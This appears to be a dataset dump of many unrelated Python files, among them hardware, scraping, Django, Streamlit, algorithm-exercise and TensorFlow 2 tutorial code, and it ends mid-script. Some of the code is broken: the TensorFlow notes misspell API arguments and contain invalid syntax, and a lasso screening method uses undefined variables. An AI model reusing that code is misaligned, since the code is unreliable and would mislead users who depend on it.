text
stringlengths
38
1.54M
import winsound
import os
import time
import sys
import turtle as tk  # NOTE(review): this alias is rebound to tkinter below; the turtle import is effectively dead

# Hard-coded Windows working directory so "themesong.wav" resolves relatively.
os.chdir('C:\\teleport\\Code\\Multi-Snake')

def play():
    """Loop the theme song until the `running` flag is cleared.

    SND_ASYNC returns immediately, so the sound is re-triggered roughly
    every 7 seconds to keep it looping.
    """
    global running
    running = True
    while running:
        winsound.PlaySound("themesong.wav", winsound.SND_ASYNC)
        time.sleep(7)

def stop():
    """Clear the playback flag and terminate the process.

    NOTE(review): sys.exit() ends the whole interpreter, not just the
    playback loop — confirm that is intended.
    """
    global running
    running = False
    sys.exit()

import tkinter as tk  # rebinds `tk` (previously turtle) — TODO confirm this shadowing is intentional
from turtle import RawTurtle, TurtleScreen, ScrolledCanvas

# Semi-transparent top-level window; note play()/stop() are never wired up here.
root = tk.Tk()
root.attributes("-alpha", 0.3)  # 30% window opacity
root.mainloop()
#!/usr/bin/env python
"""Continuously read a DS18B20 temperature sensor and mirror the value on a TM1638 display."""
import RPi.GPIO as GPIO
import ds18b20
import segment
import time


def setup():
    # One-time initialisation of the TM1638 segment display.
    segment.TM1638_init()


def destory():  # (sic) name kept as-is — renaming would change the module interface
    # Release all GPIO pins claimed by this process.
    GPIO.cleanup()


def loop():
    # Poll the sensor ten times per second forever, pushing each reading
    # to the decimal display.
    reading = 0.0
    while True:
        reading = ds18b20.ds18b20Read()
        segment.numberDisplay_dec(reading)
        time.sleep(0.1)


if __name__ == '__main__':
    setup()
    try:
        loop()
    except KeyboardInterrupt:
        # Ctrl+C is the expected way out; leave the GPIO pins clean.
        destory()
""" utility functions to read svn dumps into structured data """ from io import BytesIO import itertools import hashlib key_names = { 'Revision-number': 'revno', 'Node-path': 'path', 'Node-kind': 'kind', 'Node-action': 'action', 'Node-copyfrom-path': 'copy_from', 'Node-copyfrom-rev': 'copy_rev', 'Prop-content-length': 'props_size', 'Content-length': delattr, 'Text-content-length': 'content_size', 'Text-content-md5': delattr, 'Text-content-sha1': 'content_sha1', } def headerkv(text): key, value = text.split(':', 1) value = value.strip() if value.isdigit(): value = int(value) return key, value def read_header(fd): result = {} for key, value in map(headerkv, iter(fd.readline, '\n')): key = key_names.get(key, key) if key is delattr: continue result[key] = value return result def read_props_inner(fd): while True: line = fd.readline().strip() if line == 'PROPS-END': return kind, len = line.split(' ') assert kind == 'K' key = fd.read(int(len)) fd.read(1) # padding newline kind, len = fd.readline().strip().split() assert kind == 'V' value = fd.read(int(len)) fd.read(1) # padding newline yield key, value def read_props(fd, pl): if not pl: return [] raw = fd.read(pl) return read_props_inner(BytesIO(raw)) def read_entry(fd): headers = read_header(fd) props = dict(read_props(fd, headers.get('props_size', 0))) data = fd.read(headers.get('content_size', 0)) if 'content_sha1' in headers: content_hash = hashlib.sha1(data).hexdigest() assert content_hash == headers['content_sha1'] headers.update(props) if data: headers['data'] = data return headers def walk_entries(fd, discard_header=True): if discard_header: read_header(fd) # dump version read_header(fd) # dump uuid while True: try: entry = read_entry(fd) #XXX: why are those empty ones there if entry: yield entry except ValueError: break
#!/bin/python3
import os
import sys

#
# Complete the simpleArraySum function below.
#
def simpleArraySum(ar):
    """Return the sum of the integers in `ar`.

    Fix: the original fell through and returned None for an empty list;
    an empty array now sums to 0. The explicit len==1 branch and manual
    accumulator were redundant and are replaced by the builtin sum().
    """
    return sum(int(i) for i in ar)

#
if __name__ == '__main__':
    ar_count = int(input('Enter length of the array: '))
    ar = list(map(int, input('Enter the array elements (int), space-seperated: ').rstrip().split()))
    # Re-prompt until the number of elements matches the declared length.
    while len(ar) != ar_count:
        print('Error. Length of the array does not match the actual number of elements provided.')
        ar = list(map(int, input('Please re-enter: ').rstrip().split()))
    result = simpleArraySum(ar)
    print(result)
'''
keys:
Solutions:
Similar:
T:
S:
'''
from typing import List
# https://supercodead.blogspot.com/2019/07/1463-paper-review.html
'''
We define that the similarity between two papers is the length of longest
similar word subsequence * 2 divided by the total length of two papers.
Given two papers, words1, words2 (each represented as an array of strings),
and a list of similar pairs of words pairs, find the similarity between the
two papers.
Note: Similar relationships are transitive. For example, if "great" is
similar to "good" and "find" is similar to "good", then "geat" and "find"
are similar. Similarity is also symmetrical. For example, "great" is similar
to "good" and "good" is similar to "great". In addition, a word is always
similar to itself.
'''
class Solution:
    """
    @param words1: the words in paper1
    @param words2: the words in paper2
    @param pairs: the similar words pair
    @return: the similarity of the two papers
    """
    def getSimilarity(self, words1, words2, pairs):
        # Fix: the original method had no body (a SyntaxError as written).
        # Implementation: union-find over the similarity pairs gives the
        # transitive/symmetric word classes; an LCS on class representatives
        # gives the longest similar subsequence.
        parent = {}

        def find(w):
            # Path-halving find; unseen words are their own class.
            parent.setdefault(w, w)
            while parent[w] != w:
                parent[w] = parent[parent[w]]
                w = parent[w]
            return w

        for a, b in pairs:
            ra, rb = find(a), find(b)
            if ra != rb:
                parent[ra] = rb

        n, m = len(words1), len(words2)
        if n + m == 0:
            # Two empty papers: define similarity as 0.0 to avoid 0/0.
            return 0.0

        # Classic O(n*m) LCS where "equal" means "same similarity class".
        dp = [[0] * (m + 1) for _ in range(n + 1)]
        for i in range(1, n + 1):
            ri = find(words1[i - 1])
            for j in range(1, m + 1):
                if ri == find(words2[j - 1]):
                    dp[i][j] = dp[i - 1][j - 1] + 1
                else:
                    dp[i][j] = max(dp[i - 1][j], dp[i][j - 1])

        return dp[n][m] * 2.0 / (n + m)
import os
import numpy as np


def process(data_path, dest_path, phase):
    """Explode batched .npz archives under data_path/phase into one .npz per video.

    Returns the list of per-video file names written (or seen) in order.
    """
    saved_names = []
    batch_no = 1
    for fname in sorted(os.listdir(os.path.join(data_path, phase))):
        archive = np.load(os.path.join(data_path, phase, fname))
        feats = archive['data']        # 10 x 100 x 20 x 4096
        labs = archive['labels']       # 10 x 2
        dets = archive['det']          # 10 x 100 x 19 x 6
        vids = archive['ID']           # 10
        suffix_no = 1
        for idx, vid in enumerate(vids):
            # Prefix with the batch number; disambiguate repeated video ids.
            name = 'b' + str(batch_no).zfill(3) + '_' + vid.decode('UTF-8')
            if name in saved_names:
                name = name + '_' + str(suffix_no).zfill(2)
                suffix_no += 1
            out_file = os.path.join(dest_path, name + '.npz')
            if os.path.exists(out_file):
                # Already split in a previous run — skip quietly.
                continue
            np.savez_compressed(out_file, data=feats[idx], labels=labs[idx],
                                det=dets[idx], ID=name)
            print('batch: %03d, %s file: %s' % (batch_no, phase, name))
            saved_names.append(name)
        batch_no += 1
    return saved_names


def split_dad(data_path, dest_path):
    """Split the DAD training and testing batches into per-video files."""
    # Make sure both result directories exist before writing into them.
    train_dir = os.path.join(dest_path, 'training')
    if not os.path.exists(train_dir):
        os.makedirs(train_dir)
    test_dir = os.path.join(dest_path, 'testing')
    if not os.path.exists(test_dir):
        os.makedirs(test_dir)
    # Training split, then testing split.
    train_names = process(data_path, train_dir, 'training')
    print('Training samples: %d' % (len(train_names)))
    test_names = process(data_path, test_dir, 'testing')
    print('Testing samples: %d' % (len(test_names)))


if __name__ == '__main__':
    DAD_PATH = '/data/DAD/features'
    DEST_PATH = '/data/DAD/features_split'
    split_dad(DAD_PATH, DEST_PATH)
import sys
sys.path.append('lib')
from BShipGrid import BShipGrid
from PIL import Image, ImageDraw

# Python 2 script: renders a recorded battleship game, frame by frame,
# as PNG snapshots under shots/.
class TheGame():
    pass
    def __init__(self):
        # One wide canvas holding both players' grids side by side.
        W = 1000
        H = 200
        self.img = Image.new("RGBA", (W, H), (0,255,0,0))
        self.drawing = ImageDraw.Draw(self.img)
        # Simon's fleet layout (grid coordinates, column letter + row number).
        a = BShipGrid("Simon")
        a.markship("A1")
        a.markship("A2")
        a.markship("A3")
        a.markship("C3")
        a.markship("D3")
        a.markship("E3")
        a.markship("F3")
        a.markship("G3")
        a.markship("F6")
        a.markship("E6")
        a.markship("D6")
        a.markship("C6")
        a.markship("H1")
        a.markship("I1")
        a.markship("G10")
        a.markship("H10")
        a.markship("I10")
        a.markship("J10")
        # Alyssa's fleet layout.
        b = BShipGrid("Alyssa")
        b.markship("J5")
        b.markship("J4")
        b.markship("J6")
        b.markship("J3")
        b.markship("E9")
        b.markship("D9")
        b.markship("C9")
        b.markship("F9")
        b.markship("G9")
        b.markship("B5")
        b.markship("C5")
        b.markship("D5")
        b.markship("E2")
        b.markship("F2")
        b.markship("D2")
        b.markship("B7")
        b.markship("B8")
        self.b = b
        self.a = a
    def save(self,filename):
        # Draw both grids onto the shared canvas, then write a PNG.
        # NOTE(review): BShipGrid.draw signature assumed (drawer, x, y, w, h) — confirm in lib/BShipGrid.
        self.a.draw(self.drawing,10,10, 150, 150)
        self.b.draw(self.drawing,750,10, 150, 150)
        #self.img.save("test_draw_small.gif", "gif")#,transparency=0)
        self.img.save(filename+".png", "PNG",)

if __name__ == '__main__':
    g = TheGame()
    #shots = ["A3","A4","A5"]
    shots = []
    # Shot log: tab-separated moves per line; "!" marks a hit, "*" a sink.
    with open('./data/data.txt') as f:
        lines = f.read().splitlines()
        for line in lines:
            data = line.split("\t")
            print data
            shots += data[0:]
    # Frame 00: both boards before any shot.
    x = 0
    sx = "%02d" % (x,)
    g.save("shots/"+sx+"-master-start-game")
    x = 1
    t = 0
    print "len of shots", len(shots)
    for shot in shots:
        t = t+1
        print t
        print shot
        # Classify the shot by its trailing marker and strip it.
        if shot.find("!") > 0:
            stype = "HIT"
            cshot = shot[:-1]
        elif shot.find("*") > 0:
            stype = "SINK"
            cshot = shot[:-1]
        else:
            # Misses are not rendered — skip to the next shot.
            #if t % 2 == 1:
            print "skipping", shot
            #name="simon"
            #cshot=shot
            #stype="miss"
            #g.b.markmiss(cshot)
            continue
        # Players alternate: odd turns are Simon shooting at Alyssa's grid.
        if t % 2 == 1:
            name="simon"
            g.b.markshot(cshot)
        else:
            name="alyssa"
            g.a.markshot(cshot)
        print cshot
        # Save one numbered frame per rendered shot.
        sx = "%02d" % (x,)
        g.save("shots/"+sx+"-master-"+name+"-"+cshot+"-"+stype)
        x = x+1
import sys
from collections import deque

input = sys.stdin.readline

# Board of n rows x m columns of 0/1 cells; count the connected regions
# of 1s ("pictures") and report the largest one.
n, m = map(int, input().split())
board = [list(map(int, input().split())) for _ in range(n)]
visited = [[0] * m for _ in range(n)]

# Offsets for the four orthogonal neighbours (down, up, right, left).
dr = [1, -1, 0, 0]
dc = [0, 0, 1, -1]

q = deque()
picture_cnt = 0
picture_area = [0]  # seeded with 0 so max() is safe when no region exists

# Flood-fill (BFS) from every unvisited painted cell.
for r in range(n):
    for c in range(m):
        if board[r][c] != 1 or visited[r][c]:
            continue
        visited[r][c] = 1
        q.append([r, c])
        area = 1
        while q:
            cr, cc = q.popleft()
            for k in range(4):
                nr = cr + dr[k]
                nc = cc + dc[k]
                if 0 <= nr < n and 0 <= nc < m and board[nr][nc] == 1 and not visited[nr][nc]:
                    visited[nr][nc] = 1
                    q.append([nr, nc])
                    area += 1
        picture_area.append(area)
        picture_cnt += 1

print(picture_cnt)
print(max(picture_area))
""" Strategies for changing active set based on current iteration, the current active set and a candidate set of non-zero coefficients. """ import numpy as np import scipy.linalg as la # should we replace this with cython? from numpy.core.umath_tests import inner1d class Strategy: """ Strategy for choosing active set for p variables, given current active set and a candidate active set consisting of all coordinates that were updated in coordinate wise algorithm. Information on the current iteration the algorithm is on may also be used. """ max_greedyit = np.inf max_fitit = 1e4 def __init__(self, p): """ Default strategy is to include all variables in the active set. """ self.p = p def __call__(self, iteration, current, candidate): return self.all() def all(self): """ All variables are active. """ return np.arange(self.p) def SAFE(self, lam_max, lam, y, X): """ Screen variables using the SAFE rule. """ resid_prod = np.fabs( inner1d(X.T,resid) ) idx = resid_prod >= lam - la.norm(X[:,i])*la.norm(y)*((lam_max-lam)/lam_max) return np.where(idx)[0] def STRONG(self, lam_max, lam, resid, X): """ Screen variables using the STRONG rule. """ resid_prod = np.fabs( inner1d(X.T,resid) ) idx = resid_prod >= 2*lam_max - lam return np.where(idx)[0] class NStep(Strategy): __doc__ = Strategy.__doc__ def __init__(self, p, nstep=5): """ Update the active set active set with the candidate if iteration % nstep == 0. """ self.p = p self.nstep = nstep def __call__(self, iteration, current, candidate): if iteration % self.nstep == 0: current = np.asarray(candidate) return np.asarray(current) class NStepBurnin(Strategy): __doc__ = Strategy.__doc__ def __init__(self, p, nstep=5, burnin=1): """ Update the active set with the candidate if it % self.nstep == 0, unless it==self.burnin, in which case also return the candidate. Implicitly assumes that the initial active set is "large", and one update is enough to get a very good idea of the active set. 
Further iterations, can still drop variables from the active set after every nstep iterations. """ self.p = p self.nstep = nstep self.burnin = burnin if burnin >= nstep: raise ValueError, 'expecting burnin < nstep' def __call__(self, it, current, candidate): if it % self.nstep == 0 or it == self.burnin: current = np.asarray(candidate) return np.asarray(current)
import urllib.request
from bs4 import BeautifulSoup
from time import sleep
import json
import hashlib
import os
from PIL import Image
import requests
import shutil


def download_img(url, file_name):
    """Stream `url` to `file_name` on disk (only on HTTP 200)."""
    print(url)
    r = requests.get(url, stream=True)
    if r.status_code == 200:
        with open(file_name, 'wb') as f:
            r.raw.decode_content = True  # transparently undo gzip/deflate
            shutil.copyfileobj(r.raw, f)


def dwn(url):
    """Fetch the first <img> on the page at `url` and mirror it locally.

    The image URL is made absolute against the page's directory, then the
    host prefix is rewritten to a relative ../../ mirror path. The download
    is skipped when the mirrored file already exists.

    Fix: removed a dead `src = img.get("src")` assignment that was
    immediately overwritten by the absolute form.
    """
    html = requests.get(url).text
    soup = BeautifulSoup(html, "html.parser")
    img = soup.find("img")
    src = os.path.split(url)[0] + "/" + img.get("src")
    opath = src.replace("http://124.33.215.236/", "../../")
    if not os.path.exists(opath):
        tmp = os.path.split(opath)
        os.makedirs(tmp[0], exist_ok=True)
        download_img(src, opath)


# --- crawl the index page and mirror every 2009/2010 gallery -------------
url = "http://124.33.215.236/gazou/index_img_iwasakizenponsasyoku.php"
html = urllib.request.urlopen(url)
soup = BeautifulSoup(html, "html.parser")
urls = [a.get("href") for a in soup.find_all("a")]
for url0 in sorted(urls):
    if "___2009" in url0 or "/2010/" in url0:
        url1 = "http://124.33.215.236/gazou/" + url0.replace("./", "")
        print(url1)
        # Fix: dropped the unused `id = url1.split("TGName=")...` extraction —
        # it shadowed the builtin and crashed on URLs without a TGName query.
        try:
            html = requests.get(url1).text
        except Exception as e:
            # Best-effort crawl: log the failure and move to the next gallery.
            print(e)
            continue
        soup = BeautifulSoup(html, "html.parser")
        dwn(url1)
        # Follow every per-image reader page linked from the gallery.
        for a in soup.find_all("a"):
            href = a.get("href")
            if "_read.php" in href:
                pp = href.split("?")[0]
                url = url1.split(pp)[0] + href
                dwn(url)
import requests


def handler(event, context):
    """Serverless entry point: fetch one random user and wrap its JSON payload.

    `event` and `context` are accepted for the platform's calling convention
    but are not consulted.
    """
    response = requests.get("https://randomuser.me/api/")
    payload = response.json()
    return {"data": payload}
from django.conf.urls import url
from django.contrib import admin
from views import todolist, complete, delete

# URL routing table for the todo app: admin site plus three task views.
urlpatterns = [
    #url(r'^$', views.index, name = 'index'),
    url(r'^admin/', admin.site.urls),           # Django admin
    url(r'^$', todolist),                       # task list at the site root
    url(r'^complete/(?P<pk>\d+)/', complete),   # mark task <pk> as done
    url(r'^delete/(?P<pk>\d+)/', delete),       # remove task <pk>
]
from bs4 import BeautifulSoup
import requests
import streamlit as st
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import datetime
from dateutil.relativedelta import *

# Streamlit app: plot closing prices for companies listed on the Warsaw
# Stock Exchange (GPW), with data scraped from stooq.pl.
st.set_page_config(
    page_title="Akcje GPW",
    page_icon="",
    #layout="wide",
    initial_sidebar_state="expanded"
)

st.title('Generator wykresów cen akcji notowanych na GPW')
#st.markdown("""
## Generator wykresu ceny wybranej spółki z Giełdy Papierów Wartościowych w Warszawie
#Dane pochodzą z portalu stooq.pl
#""")

# Placeholder later replaced by a success/warning status message.
InformationContainer = st.empty()

@st.cache
def PobierzSpolkiGPW():
    # Scrape the paged GPW listing from stooq.pl; returns [code, name] pairs.
    def getPage(url):
        page = requests.get(url)
        soup = BeautifulSoup(page.text, "html.parser")
        return soup
    page_iter = 1
    Spolki = []
    url = "https://stooq.pl/t/?i=523&v=0&l={}"
    while(1==1):
        page = getPage(url.format(page_iter))
        tabela_z_spolkami = page.find("table", {"id" : "fth1"}).find("tbody")
        if len(tabela_z_spolkami) <= 0 :
            # Empty table body means we ran past the last page.
            break
        else:
            for wiersz in tabela_z_spolkami:
                # f13 = ticker code cell, f10 = company name cell (stooq ids).
                Spolki.append([wiersz.find(id = "f13").text, wiersz.find(id = "f10").text])
            page_iter+=1
    return Spolki

Spolki = PobierzSpolkiGPW()

@st.cache
def DownloadPriceData(ChosenCompany):
    # Download the daily price history CSV for one ticker and clean it up.
    download_data_path = 'https://stooq.pl/q/d/l/?s='+ ChosenCompany + '&i=d'
    #st.write(download_data_path)
    Price_Data = requests.get(download_data_path)
    Price_Data = Price_Data.text.split('\r\n')
    Price_Data = [wiersz.split(',') for wiersz in Price_Data]
    cols = Price_Data[0]   # first CSV row is the header
    data = Price_Data[1:]
    df1 = pd.DataFrame(columns = cols, data = data)
    df1 = df1.dropna()
    # "Zamkniecie" = closing price, "Data" = date (stooq's Polish columns).
    df1["Zamkniecie"] = pd.to_numeric(df1["Zamkniecie"], downcast="float")
    df1['Data'] = pd.to_datetime(df1['Data'])
    #df1.sort_values(by=['Data'], inplace=True, ascending=False)
    return df1

#add_selectbox = st.sidebar.selectbox(
#    "Jak oceniasz apkę?",
#    ("Dobra", "Średnia", "Zła")
#)

# Company picker: entries rendered as "Name (CODE)" plus a placeholder.
WybranaSpolka_selectbox = st.sidebar.selectbox(
    "Wybierz spółkę",
    ["<wybierz>"]+[item[1] + " ("+item[0]+")" for item in Spolki],
    0 #index of default element
)

@st.cache(allow_output_mutation=True)
def button_states():
    # Mutable cached dict shared across Streamlit reruns.
    return {"pressed": None}

is_pressed = button_states() # gets our cached dictionary

if WybranaSpolka_selectbox != "<wybierz>":
    # Extract the ticker code back out of the "Name (CODE)" label.
    WybranaSpolka_KOD = WybranaSpolka_selectbox[ int(WybranaSpolka_selectbox.find("(")+1) : int(WybranaSpolka_selectbox.find(")")) ]
    InformationContainer = st.success("Wybrana spółka: " + WybranaSpolka_selectbox)
    #InformationContainer = st.info('Pobieram dane o wybranej spółce...')
    df1 = DownloadPriceData(WybranaSpolka_KOD)
    # Date-range slider; assumes rows arrive newest-first so iloc[-1] is the
    # oldest date — TODO confirm against the stooq CSV ordering.
    ZakresDat_Filter = st.sidebar.slider(
        "Wybierz zakres dat",
        df1["Data"].iloc[-1].date(),
        df1["Data"].iloc[0].date(),
        (df1["Data"].iloc[-1].date(), df1["Data"].iloc[0].date())
    )
    #col1, col2 , col3 , col4, col5, col6, col7= st.sidebar.beta_columns([1,1,1,1,1,1,1])
    #button_2t = col2.checkbox("2t")
    #if(button_2t):
    #    ZakresDat_Filter = st.sidebar.empty()
    #    ZakresDat_Filter = st.sidebar.slider(
    #        "Wybierz zakres dat",
    #        df1["Data"].iloc[-1].date(),
    #        df1["Data"].iloc[0].date(),
    #        (df1["Data"].iloc[-1].date() - relativedelta(weeks=2), df1["Data"].iloc[-1].date())
    #    )
    #
    #
    #
    #
    #col2.checkbox("1m")
    #col3.button("6m")
    #col4.button("1r")
    #col5.button("2r")
    #col6.button("5r")
    #col7.button("all")
    SredniaRuchoma_Filter = st.sidebar.checkbox("Średnia ruchoma")
    #SredniaRuchoma_Filter = col1.checkbox("Srednia Ruchoma")
    SredniaRuchoma_Param1 = st.empty()
    if (SredniaRuchoma_Filter):
        # Moving-average window length in sessions (1..500, default 4).
        SredniaRuchoma_Param1 = st.sidebar.slider(#col2.slider( #
            'Opóźnienie', 1, 500, 4
        )
    if(st.sidebar.button("Generuj Wykres")):
        # Restrict to the chosen date window and plot the closing price.
        mask = (df1["Data"] >= ZakresDat_Filter[0]) & (df1["Data"] <= ZakresDat_Filter[1])
        df1 = df1.loc[mask]
        fig, ax = plt.subplots()
        ax.plot(df1['Data'], df1['Zamkniecie'])
        if(SredniaRuchoma_Filter):
            # Overlay the rolling mean of the close.
            ax.plot(df1['Data'], df1.Zamkniecie.rolling(window = SredniaRuchoma_Param1 ).mean())
        ax.grid = True  # NOTE(review): assigns over Axes.grid; likely meant ax.grid(True)
        fig.autofmt_xdate()
        st.pyplot(fig)
else:
    InformationContainer = st.warning('Wybierz spółkę')

with st.beta_expander("TO DO"):
    st.image("https://www.maccsuso.org.uk/wp-content/uploads/2020/03/things-to-do.png")
    st.write(""" Filtry na datę. 
Najlepiej jakieś suwaki fajne z wyłapywaniem błędów typu od > do. 
Mądre dobieranie dat do wykresu - label i ogólnie nie ma sensu chyba każdej daty prezentować. 
Zaznaczyć dywidendę. 
Dodawanie lini trendu, średniej ruchomej do wyłapywania zmian trendu. 
buttony do zakresu dat sprawić zeby aktualizowaly slider! 
dodać postawowe wskazniki dla spolki w kontenerze obok 
PORTFEL zrobic z wykorzystaniem klasy. Osobny kontener do tego. 
""" , )

#with st.beta_container():
#    st.write("This is inside the container")
#
#    # You can call any Streamlit command, including custom components:
#    st.bar_chart(np.random.randn(50, 3))

#st.write(df1['Data'].head(), df1['Zamkniecie'].head())
#p.line(x = df1['Data'], y = df1['Zamkniecie'], legend='Trend', line_width=2)
#fig = plt.plot(df1['Data'], df1['Zamkniecie'])
#options = st.multiselect('What are your favorite colors',['Green', 'Yellow', 'Red', 'Blue'],['Yellow', 'Red'])
#progress_bar = st.progress(0)
#progress_bar.progress(100)
#st.dataframe(df1)
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed Jan 15 10:13:13 2020 TensorFlow2.0 常用函数 tf.keras:构建和训练模型(Sequential模式、函数式API) Eager模式:直接迭代和直观调试 tf.GradientTape:求解梯度,自定义训练模式 tf.data:加载图片与结构化数据 tf.function:自动图运算 @author: liutingting16 """ import pandas as pd import numpy as np import tensorflow as tf import matplotlib.pyplot as plt #%matplotlib inline # !pip install tensorflow==2.0.0-beta1 # !pip install tensorflow-gpu==2.0.0-beta0 #%% tf.keras model = tf.keras.Sequential() model.add(tf.keras.layers.Dense(1, input_shape=(1,))) # 第一个参数是输出维度 model.summary() model.compile(optimizer='adam', loss='mse') model.fit(train_x, train_y, epochs=30) model.predict(text_x) #%% 二分类:logistic model train_x = np.random.rand(100,3) train_y = np.random.randint(0,2,(100,1)) test_x = np.random.rand(100,3) test_y = np.random.randint(0,2,(100,1)) model = tf.keras.Sequential([tf.keras.layers.Dense(10, input_shape=(3,), activation='relu'), #第一层需要定义输入数据的维度:input_shape tf.keras.layers.Dense(5, activation='relu'), tf.keras.layers.Dense(1, activation='sigmoid')]) model.summary() model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc']) #history = model.fit(train_x, train_y, epochs=300) history = model.fit(train_x, train_y, epochs=300, validation_data=(test_x, test_y)) # 在每个epoch上评估测试集准确率 model.predict(test_x) print(history.history.keys()) # losss, acc, val_loss, val_acc plt.plot(history.epoch, history.history.get('loss'), label='loss') plt.plot(history.epoch, history.history.get('val_loss'), label='val_loss') plt.legend() #%% mnist多分类:softmax交叉熵 (train_image, train_label), (test_image, test_label) = tf.keras.datasets.fashion_mnist.load_data() plt.imshow(train_image[0]) train_image = train_image/255.0 # 0-1值 test_image = test_image/255.0 # 0-1值 model = tf.keras.Sequential() model.add(tf.keras.layers.Flatten(input_shape=(28, 28))) # 将张量拉平成同一维度 (28,28) -> 28*28 model.add(tf.keras.layers.Dense(128, activation='relu')) model.add(tf.keras.layers.Dropout(0.1)) 
model.add(tf.keras.layers.Dense(10, activation='softmax')) model.summary() model.compile(opitimizer=tf.keras.optimizer.Adam(lr=0.01), loss='sparse_categorical_corssentropy', # 当label为顺序数字编码时 # loss='categorical_corssentropy', # 当label为onehot编码时 metrics=['acc']) history = model.fit(train_image, train_label, epochs=30) model.evaluate(test_image, test_label) # 评估 predict = model.predict(test_image) #预测 print(predict[0]) # 返回预测概率 print(np.argmax(predict[0])) # 返回最大概率的位置 print(test_label[0]) # 真实标签 train_label_hoehot = tf.keras.utils.to_categorial(train_label) # 转化train_label为onehot标签 test_label_hoehot = tf.keras.utils.to_categorial(test_label) # 转化test_label为onehot标签 #%% 函数式API input1 = tf.keras.Input(shape=(28,28)) input2 = tf.keras.Input(shape=(28,28)) x1 = tf.keras.layers.Flatten()(input1) x2 = tf.keras.layers.Flatten()(input2) x = tf.keras.layers.concatenate([x1,x2]) x = tf.keras.layers.Dense(32, activation='relu')(x) x = tf.keras.layers.Dropout(0.2)(x) x = tf.keras.layers.Dense(64, activation='relu')(x) outputs = tf.keras.layers.Dense(10, activation='softmax')(x) model = tf.keras.Model(inputs=[input1, input2], outputs=outputs) # 多输入,单输出 model.summary() model.compile() # 方式同上 #%% tf.data # 创建dataset的几种方式 dataset = tf.data.Dataset.from_tensor_slices([1,2,3,4,5]) dataset = tf.data.Dataset.from_tensor_slices([[1,2],[3,4],[5,6]]) dataset = tf.data.Dataset.from_tensor_slices({'a':[1,2,3,4], 'b':[6,7,8,9], 'c':[12,13,14,15]}) dataset = tf.data.Dataset.from_tensor_slices(np.array([1,2,3,4,5])) for ele in dataset: print(ele) for ele in dataset: print(ele.numpy()) # 转换回numpy数据格式 for ele in dataset.take(4): # 提取topN print(ele.numpy()) # shuffle, repeat, batch的使用 dataset = dataset.shuffle(buffer_size=5, seed=0) # 打乱 dataset = dataset.repeat(count=3) # 重复 dataset = dataset.batch(batch_size=3) for ele in dataset: print(ele.numpy()) # 数据变换:map dataset = tf.data.Dataset.from_tensor_slices([1,2,3,4,5]) dataset = dataset.map(tf.square) print([ele.numpy() for ele in dataset]) # 
mnist示例 (train_image, train_label), (test_image, test_label) = tf.keras.datasets.fashion_mnist.load_data() train_image = train_image/255.0 # 0-1值 test_image = test_image/255.0 # 0-1值 print(train_image.shape) # (60000, 28, 28) ds_train_img = tf.data.Dataset.from_tensor_slices(train_image) ds_train_lab = tf.data.Dataset.from_tensor_slices(train_label) ds_train = tf.data.Dataset.zip((ds_train_img, ds_train_lab)) #两个tensor的对应位置元素合并,((28,28),()) ds_test = tf.data.Dataset.from_tensor_slices((test_image, test_label)) #同ds_train生成的效果一样,((28,28),()) ds_train = ds_train.shuffle(10000).repeat().batch(64) ds_test = ds_test.batch(64) # 默认使用了repeat() model = tf.keras.Sequential(tf.keras.layers.Flatten(input_shape=(28, 28)), tf.keras.layers.Dense(128, activation='relu'), tf.keras.layers.Dropout(0.1), tf.keras.layers.Dense(10, activation='softmax')) model.summary() model.compile(opitimizer=tf.keras.optimizer.Adam(lr=0.01), loss='sparse_categorical_corssentropy', # 当label为顺序数字编码时 metrics=['acc']) history = model.fit(ds_train, epochs=5, steps_per_epoch=train_image.shape[0]//64, # "//" used to be int validation_data=ds_test, validation_steps=test_image.shape[0]//64) #%% CNN import keras from keras import layers layers.Conv2D(filters, #卷积核数量(即卷积后的通道数) kernal_size, #卷积核大小 strides=(1,1), #步长为1 padding='valid', # 'same' activation='relu', use_bias=True, kernel_initializer='glorot_uniform', bias_initializer=None, kernel_regularizer=None, #正则化 bias_regularizer=None) layers.MaxPooling2D(pool_size=(2,2), strides=None, padding='valid') # mnist示例 # !pip install -q tensorflow-gpu==2.0.0-alpha0 import tensorflow as tf tf.test.is_gpu_available() (train_image, train_label), (test_image, test_label) = tf.keras.datasets.fashion_mnist.load_data() train_image = np.expand_dims(train_image, -1) # 或reshape(), -1表示扩增的最后一个维度,生成[样本量,长,宽,通道],与上述使用Flatten不同 test_image = np.expand_dims(test_image, -1) model = tf.keras.Sequential() model.add(tf.keras.layers.Conv2D(32, (3,3), input_shape=train_image.shape[1:], 
#shape[1:]表示除去第一维度,即去除batch的维度,首次需要定义该参数 activation='relu', padding='same')) print(model.output_shape) #(None, 28, 28 ,32) model.add(tf.keras.layers.MaxPooling2D()) # default pooling_size=(2,2), #(None, 14, 14 ,32) model.add(tf.keras.layers.Dropout(0.1)) model.add(tf.keras.layers.Conv2D(64, (3,3), activation='relu', padding='same')) #(None, 14, 14 ,64) model.add(tf.keras.layers.MaxPooling2D()) #(None, 7, 7 ,64) model.add(tf.keras.layers.Dropout(0.1)) model.add(tf.keras.layers.GlobalAveragePooling2D()) #全局平均池化,或使用Flatten()使其变成1个维度, (None, 64) model.add(tf.keras.layers.Dense(128, activation='relu')) #FFN, (None, 128) model.add(tf.keras.layers.Dense(10, activation='softmax')) #softmax层,(None, 10) model.summary() model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['acc']) history = model.fit(train_image, train_label, epochs=10, validation_data=(test_image, test_label)) print(history.history.keys()) # losss, acc, val_loss, val_acc plt.plot(history.epoch, history.history.get('acc'), label='acc') plt.plot(history.epoch, history.history.get('val_acc'), label='val_acc') plt.legend() #%% 卫星图像二分类示例(tf.data和CNN) import pathlib import random # 获取图片路径 data_dir = './dateset/2_class' data_root = pathlib.Path(data_dir) for item in data_root.iterdir(): print(item) all_image_path = list(data_root.glob('*/*')) #获取固定正则表达式下的文件路径 all_image_path = [str(x) for x in all_image_path] random.shuffle(all_image_path) image_count = len(all_image_path) #1400 # 获取样本标签 label_names = sorted(item.name for item in data_root.glob('*/')) # ['airplane', 'lake'] label_to_index = dict((name, index) for index, name in enumerate(label_names)) # {'airplane':0, 'lake':1} # pathlib.Path('xx/xx/xxxx.jpg').parent.name # 'lake' all_image_label = [label_to_index[pathlib.Path(p).parent.name] for p in all_image_path] #获取每个样本的标签: 0/1 # 随机显示图像 import Ipython.display as display index_to_label = dict(v,k for k,v in label_to_index.items) # {0:'airplane', 1:'lake'} for n in range(3): image_index 
